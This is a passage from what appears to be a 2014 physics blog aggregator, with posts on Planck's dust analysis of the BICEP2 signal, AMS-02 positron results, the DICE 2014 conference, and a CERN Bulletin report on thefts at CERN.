When they quantify all this logic, they conclude that about one-half of the BICEP2 signal is due to dust and the remaining one-half has to be due to the primordial gravitational waves; that's why their preferred \(r\), the tensor-to-scalar ratio, drops from BICEP2's most ambitious \(r=0.2\) to \(r=0.11\pm 0.04\), a value very nicely compatible with chaotic inflation. The values "one-half" aren't known quite accurately but with the error margins they seem to work with, they still seem to see that the value \(r=0\) – i.e. non-discovery of the primordial gravitational waves – may be excluded at the 2.5-sigma level.

"Engineers with a diploma" vs "The Big Bang Theory"

by Luboš Motl ( at September 22, 2014 01:17 PM

Tommaso Dorigo - Scientificblogging

Sam Ting On AMS Results: Dark Matter Might Be One Seminar Away
Last Friday Samuel Ting, the winner of the 1975 Nobel prize in Physics for the co-discovery of the J/ψ particle, gave a seminar in the packed CERN main auditorium on the latest results from AMS, the Alpha Magnetic Spectrometer installed on the international space station.

read more

by Tommaso Dorigo at September 22, 2014 12:14 PM

Jester - Resonaances

Dark matter or pulsars? AMS hints it's neither.
Yesterday AMS-02 updated their measurement of cosmic-ray positron and electron fluxes. The newly published data extend to positron energies 500 GeV, compared to 350 GeV in the previous release. The central value of the positron fraction in the highest energy bin is one third of the error bar lower than the central value of the next-to-highestbin.  This allows the collaboration to conclude that the positron fraction has a maximum and starts to decrease at high energies :]  The sloppy presentation and unnecessary hype obscures the fact that AMS actually found something non-trivial.  Namely, it is interesting that the positron fraction, after a sharp rise between 10 and 200 GeV, seems to plateau at higher energies at the value around 15%.  This sort of behavior, although not expected by popular models of cosmic ray propagation, was actually predicted a few years ago, well before AMS was launched.  

Before I get to the point, let's have a brief summary. In 2008 the PAMELA experiment observed a steep rise of the cosmic ray positron fraction between 10 and 100 GeV. Positrons are routinely produced by scattering of high energy cosmic rays (secondary production), but the rise was not predicted by models of cosmic ray propagations. This prompted speculations of another (primary) source of positrons: from pulsars, supernovae or other astrophysical objects, to  dark matter annihilation. The dark matter explanation is unlikely for many reasons. On the theoretical side, the large annihilation cross section required is difficult to achieve, and it is difficult to produce a large flux of positrons without producing an excess of antiprotons at the same time. In particular, the MSSM neutralino entertained in the last AMS paper certainly cannot fit the cosmic-ray data for these reasons. When theoretical obstacles are overcome by skillful model building, constraints from gamma ray and radio observations disfavor the relevant parameter space. Even if these constraints are dismissed due to large astrophysical uncertainties, the models poorly fit the shape the electron and positron spectrum observed by PAMELA, AMS, and FERMI (see the addendum of this paper for a recent discussion). Pulsars, on the other hand, are a plausible but handwaving explanation: we know they are all around and we know they produce electron-positron pairs in the magnetosphere, but we cannot calculate the spectrum from first principles.

But maybe primary positron sources are not needed at all? The old paper by Katz et al. proposes a different approach. Rather than starting with a particular propagation model, it assumes the high-energy positrons observed by PAMELA are secondary, and attempts to deduce from the data the parameters controlling the propagation of cosmic rays. The logic is based on two premises. Firstly, while production of cosmic rays in our galaxy contains many unknowns, the production of different particles is strongly correlated, with the relative ratios depending on nuclear cross sections that are measurable in laboratories. Secondly, different particles propagate in the magnetic field of the galaxy in the same way, depending only on their rigidity (momentum divided by charge). Thus, from an observed flux of one particle, one can predict the production rate of other particles. This approach is quite successful in predicting the cosmic antiproton flux based on the observed boron flux. For positrons, the story is more complicated because of large energy losses (cooling) due to synchrotron and inverse-Compton processes. However, in this case one can make the  exercise of computing the positron flux assuming no losses at all. The result correspond to roughly 20% positron fraction above 100 GeV. Since in the real world cooling can only suppress the positron flux, the value computed assuming no cooling represents an upper bound on the positron fraction.

Now, at lower energies, the observed positron flux is a factor of a few below the upper bound. This is already intriguing, as hypothetical primary positrons could in principle have an arbitrary flux,  orders of magnitude larger or smaller than this upper bound. The rise observed by PAMELA can be interpreted that the suppression due to cooling decreases as positron energy increases. This is not implausible: the suppression depends on the interplay of the cooling time and mean propagation time of positrons, both of which are unknown functions of energy. Once the cooling time exceeds the propagation time the suppression factor is completely gone. In such a case the positron fraction should saturate the upper limit. This is what seems to be happening at the energies 200-500 GeV probed by AMS, as can be seen in the plot. Already the previous AMS data were consistent with this picture, and the latest update only strengthens it.

So, it may be that the mystery of cosmic ray positrons has a simple down-to-galactic-disc explanation. If further observations show the positron flux climbing  above the upper limit or dropping suddenly, then the secondary production hypothesis would be invalidated. But, for the moment, the AMS data seems to be consistent with no primary sources, just assuming that the cooling time of positrons is shorter than predicted by the state-of-the-art propagation models. So, instead of dark matter, AMS might have discovered models of cosmic-ray propagation need a fix. That's less spectacular, but still worthwhile.

Thanks to Kfir for the plot and explanations. 

by Jester ( at September 22, 2014 09:27 AM

Sean Carroll - Preposterous Universe

Planck Speaks: Bad News for Primordial Gravitational Waves?

Ever since we all heard the exciting news that the BICEP2 experiment had detected “B-mode” polarization in the cosmic microwave background — just the kind we would expect to be produced by cosmic inflation at a high energy scale — the scientific community has been waiting on pins and needles for some kind of independent confirmation, so that we could stop adding “if it holds up” every time we waxed enthusiastic about the result. And we all knew that there was just such an independent check looming, from the Planck satellite. The need for some kind of check became especially pressing when some cosmologists made a good case that the BICEP2 signal may very well have been dust in our galaxy, rather than gravitational waves from inflation (Mortonson and Seljak; Flauger, Hill, and Spergel).

Now some initial results from Planck are in … and it doesn’t look good for gravitational waves. (Warning: I am not a CMB experimentalist or data analyst, so take the below with a grain of salt, though I tried to stick close to the paper itself.)

Planck intermediate results. XXX. The angular power spectrum of polarized dust emission at intermediate and high Galactic latitudes
Planck Collaboration: R. Adam, et al.

The polarized thermal emission from Galactic dust is the main foreground present in measurements of the polarization of the cosmic microwave background (CMB) at frequencies above 100GHz. We exploit the Planck HFI polarization data from 100 to 353GHz to measure the dust angular power spectra CEE,BBℓ over the range 40<ℓ<600. These will bring new insights into interstellar dust physics and a precise determination of the level of contamination for CMB polarization experiments. We show that statistical properties of the emission can be characterized over large fractions of the sky using Cℓ. For the dust, they are well described by power laws in ℓ with exponents αEE,BB=−2.42±0.02. The amplitudes of the polarization Cℓ vary with the average brightness in a way similar to the intensity ones. The dust polarization frequency dependence is consistent with modified blackbody emission with βd=1.59 and Td=19.6K. We find a systematic ratio between the amplitudes of the Galactic B- and E-modes of 0.5. We show that even in the faintest dust-emitting regions there are no "clean" windows where primordial CMB B-mode polarization could be measured without subtraction of dust emission. Finally, we investigate the level of dust polarization in the BICEP2 experiment field. Extrapolation of the Planck 353GHz data to 150GHz gives a dust power ℓ(ℓ+1)CBBℓ/(2π) of 1.32×10−2μK2CMB over the 40<ℓ<120 range; the statistical uncertainty is ±0.29 and there is an additional uncertainty (+0.28,-0.24) from the extrapolation, both in the same units. This is the same magnitude as reported by BICEP2 over this ℓ range, which highlights the need for assessment of the polarized dust signal. The present uncertainties will be reduced through an ongoing, joint analysis of the Planck and BICEP2 data sets.

We can unpack that a bit, but the upshot is pretty simple: Planck has observed the whole sky, including the BICEP2 region, although not in precisely the same wavelengths. With a bit of extrapolation, however, they can use their data to estimate how big a signal should be generated by dust in our galaxy. The result fits very well with what BICEP2 actually measured. It’s not completely definitive — the Planck paper stresses over and over the need to do more analysis, especially in collaboration with the BICEP2 team — but the simplest interpretation is that BICEP2’s B-modes were caused by local contamination, not by early-universe inflation.

Here’s the Planck sky, color-coded by amount of B-mode polarization generated by dust, with the BICEP2 field indicated at bottom left of the right-hand circle:


Every experiment is different, so the Planck team had to do some work to take their measurements and turn them into a prediction for what BICEP2 should have seen. Here is the sobering result, expressed (roughtly) as the expected amount of B-mode polarization as a function of angular size, with large angles on the left. (Really, the BB correlation function as a function of multipole moment.)


The light-blue rectangles are what Planck actually sees and attributes to dust. The black line is the theoretical prediction for what you would see from gravitational waves with the amplitude claimed by BICEP2. As you see, they match very well. That is: the BICEP2 signal is apparently well-explained by dust.

Of course, just because it could be dust doesn’t mean that it is. As one last check, the Planck team looked at how the amount of signal they saw varied as a function of the frequency of the microwaves they were observing. (BICEP2 was only able to observe at one frequency, 150 GHz.) Here’s the result, compared to a theoretical prediction for what dust should look like:


Again, the data seem to be lining right up with what you would expect from dust.

It’s not completely definitive — but it’s pretty powerful. BICEP2 did indeed observe the signal that they said they observed; but the smart money right now is betting that the signal didn’t come from the early universe. There’s still work to be done, and the universe has plenty of capacity for surprising us, but for the moment we can’t claim to have gathered information from quite as early in the history of the universe as we had hoped.

by Sean Carroll at September 22, 2014 01:13 AM

September 21, 2014

Marco Frasca - The Gauge Connection

DICE 2014

I have spent this week in Castiglioncello participating to the Conference DICE 2014. This Conference is organized with a cadence of two years with the main efforts due to Thomas Elze.

Castello Pasquini a Castiglioncello sede di DICE 2014

Castello Pasquini at Castiglioncello  (DICE 2014)

I have been a participant to the 2006 edition where I gave a talk about decoherence and thermodynamic limit (see here and here). This is one of the main conferences where foundational questions can be discussed with the intervention of some of the major physicists. This year there have been 5 keynote lectures from famous researchers. The opening lecture was held by Tom Kibble, one of the founding fathers of the Higgs mechanism. I met him at the registration desk and I have had the luck of a handshake and a few words with him. It was a recollection of the epic of the Standard Model. The second notable lecturer was Mario Rasetti. Rasetti is working on the question of big data that is, the huge number of information that is currently exchanged on the web having the property to be difficult to be managed and not only for a matter of quantity. What Rasetti and his group showed is that topological field theory yields striking results when applied to such a case. An application to NMRI for the brain exemplified this in a blatant manner.

The third day there were the lectures by Avshalom Elitzur and Alain Connes, the Fields medallist. Elitzur is widely known for the concept of weak measurement that is a key idea of quantum optics. Connes presented his recent introduction of the quanta of geometry that should make happy loop quantum gravity researchers.Alain Connes at DICE2014 You can find the main concepts here. Connes explained how the question of the mass of the Higgs got fixed and said that, since his proposal for the geometry of the Standard Model, he was able to overcome all the setbacks that appeared on the way. This was just another one. From my side, his approach appears really interesting as the Brownian motion I introduced in quantum mechanics could be understood through the quanta of volumes that Connes and collaborators uncovered.

Gerard ‘t Hooft talked on Thursday. The question he exposed was about cellular automaton and quantum mechanics (see here). It is several years that ‘t Hoof t is looking for a classical substrate to quantum mechanics and this was also the point of other speakers at the Conference. Indeed, he has had some clashes with people working on quantum computation as ‘t Hooft, following his views, is somewhat sceptical about it.'t Hooft at DICE2014 I intervened on this question based on the theorem of Lieb and Simon, generally overlooked in such discussions, defending ‘t Hoof ideas and so, generating some fuss (see here and the discussion I have had with Peter Shor and Aram Harrow). Indeed, we finally stipulated that some configurations can evade Lieb and Simon theorem granting a quantum behaviour at macroscopic level.

This is my talk at DICE 2014 and was given the same day as that of  ‘t Hooft (he was there listening)My talk at DICE 2014. I was able to prove the existence of fractional powers of Brownian motion and presented new results with the derivation of the Dirac equation from a stochastic process.

The Conference was excellent and I really enjoyed it. I have to thank the organizers for the beautiful atmosphere and the really pleasant stay with a full immersion in wonderful science. All the speakers yielded stimulating and enjoyable talks. For my side, I will keep on working on foundational questions and look forward for the next edition.

Marco Frasca (2006). Thermodynamic Limit and Decoherence: Rigorous Results Journal of Physics: Conference Series 67 (2007) 012026 arXiv: quant-ph/0611024v1

Ali H. Chamseddine, Alain Connes, & Viatcheslav Mukhanov (2014). Quanta of Geometry arXiv arXiv: 1409.2471v3

Gerard ‘t Hooft (2014). The Cellular Automaton Interpretation of Quantum Mechanics. A View on the Quantum Nature of our Universe, Compulsory or Impossible? arXiv arXiv: 1405.1548v2

Filed under: Conference, Quantum mechanics Tagged: Alain Connes, Avshalom Elitzur, DICE 2014, Foundations of quantum mechanics, Gerard 't Hooft, Mario Rasetti, Tom Kibble

by mfrasca at September 21, 2014 08:40 PM

September 20, 2014

Michael Schmitt - Collider Blog

New AMS Results – hints of TeV Dark Matter?

Yesterday the AMS Collaboration released updated results on the positron excess. The press release is available at the CERN press release site. (Unfortunately, the AMS web site is down due to syntax error – I’m sure this will be fixed very soon.)

The Alpha Magnetic Spectrometer was installed three years ago at the International Space Station. As the name implies, it can measure the charge and momenta of charged particles. It can also identify them thanks to a suite of detectors providing redundant and robust information. The project was designed and developed by Prof. Sam Ting (MIT) and his team. An international team including scientists at CERN coordinate the analysis of data.

AMS installed on the ISS. Photo from bowshooter blog.

There are more electrons than positrons striking the earth’s atmosphere. Scientists can predict the expected rate of positrons relative to the rate of electrons in the absence of any new phenomena. It is well known that the observed positron rate does not agree with this prediction. This plot shows the deviation of the AMS positron fraction from the prediction. Already at an energy of a couple of GeV, the data have taken off.

AMS positron fraction compared to prediction.

AMS positron fraction compared to prediction.

The positron fraction unexpectedly increases starting around 8 GeV. At first it increases rapidly, with a slower increase above 10 GeV until 250 GeV or so. AMS reports the turn-over to a decrease to occur at 275 ± 32 GeV though it is difficult to see from the data:

AMS positron fraction.  The upper plot shows the slope.

AMS positron fraction. The upper plot shows the slope.

This turnover, or edge, would correspond notionally to a Jacobian peak — i.e., it might indirectly indicate the mass of a decaying particle. The AMS press release mentions dark matter particles with a mass at the TeV scale. It also notes that no sharp structures are observed – the positron fraction may be anomalous but it is smooth with no peaks or shoulders. On the other hand, the observed excess is too high for most models of new physics, so one has to be skeptical of such a claim, and think carefully for an astrophysics origin of the “excess” positrons — see the nice discussion in Resonaances.

As an experimenter, it is a pleasure to see this nice event display for a positron with a measured energy of 369 GeV:

AMS event display: a high-energy positron

AMS event display: a high-energy positron

Finally, AMS reports that there is no preferred direction for the positron excess — the distribution is isotropic at the 3% level.

There is no preprint for this article. It was published two days ago in PRL 113 (2014) 121101″

by Michael Schmitt at September 20, 2014 09:16 PM

September 19, 2014

CERN Bulletin

Midsummer mysteries: Criminal masterminds? Not really…

In the summer, when offices are empty and the library is full of new faces, it may seem like a perfect opportunity to steal IT equipment. However, as we know, stealing never pays and thieves always get caught. Just like the person who stole several bikes parked in front of Reception…


Image: Katarina Anthony.

 As we have said many times: security affects us all. It would seem that the crafty little devil who stole four computers from the library (three privately owned and one belonging to CERN) in July hadn’t read our article. This individual naïvely thought that it would be possible to commit the thefts, sell his ill-gotten gains on the CERN Market and still get away with it.

But he was wrong, as the CERN security service and the IT security service were able to identify the guilty party within just a few days.  “The computers had been stolen over a period of four days but it was obvious to us that the same person was responsible,” explains Didier Constant, Head of the Security Service. “Thanks to the IT security service, we could see that the stolen computers had been connected to the CERN network after they were taken and that they had been put up for sale on the CERN Market.”

The thief’s strategic error was blatantly obvious in this case. However, even when the intentions are clear, it is not always so easy to find proof, especially if the thief tries to defend himself with explanations and alibis like a professional criminal. “The Geneva police helped us a lot,” says Didier Constant. “The person eventually admitted to three of the four thefts. He had probably sold the fourth computer outside CERN.”

Fortunately, the security service is never on holiday: also in July, another person thought he could come to CERN on the tram, help himself to a bike parked near Reception and use it to get away, repeating this process several times. “In total, over three weeks, this person stole about 10 bikes,” explains Didier Constant. “In this case we were able to identify the guilty party from our security cameras and the police had a criminal record for him.”

So there you have two very interesting stories. In both cases, it was thanks to tickets created on the CERN Portal that these crimes could be dealt with by experts in the services concerned and by the police. If you see unusual behaviour or if you are the victim of theft, don’t hesitate to report it.

September 19, 2014 09:09 PM